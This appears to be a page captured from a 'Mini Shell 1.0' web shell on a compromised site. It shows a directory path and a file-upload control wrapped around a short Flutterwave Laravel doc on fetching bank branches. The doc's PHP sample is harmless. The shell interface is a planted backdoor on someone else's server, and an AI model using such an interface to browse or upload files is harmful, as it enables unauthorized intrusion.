HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/vendor/kingflamez/laravelrave/docs/banks/
Upload File :
Current File : /var/www/devs.lapieza.net/vendor/kingflamez/laravelrave/docs/banks/bank-branches.md
# Get Bank Branches

This helps you get the bank branches, pass the id of the bank. Click [here](/banks/list-banks) to get bank ids

## Sample

```php
<?php

$bankId = 191;
$branches = Flutterwave::banks()->branches($bankId);

dd($branches);

```